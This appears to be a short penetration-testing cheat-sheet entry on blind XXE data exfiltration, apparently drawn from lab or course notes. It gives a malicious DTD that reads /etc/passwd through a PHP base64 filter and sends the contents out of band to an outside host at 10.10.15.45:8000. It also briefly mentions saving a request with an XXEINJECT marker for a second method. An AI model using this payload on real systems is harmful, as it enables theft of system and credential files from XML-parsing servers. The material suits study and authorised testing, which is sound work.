Blind Data Exfiltration
subl xxe.dtd
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://10.10.15.45:8000/?content=%file;'>">





Option 2
First we need to save the request to blind.req
Then just edit the XML content and make sure to put the XXEINJECT


Last updated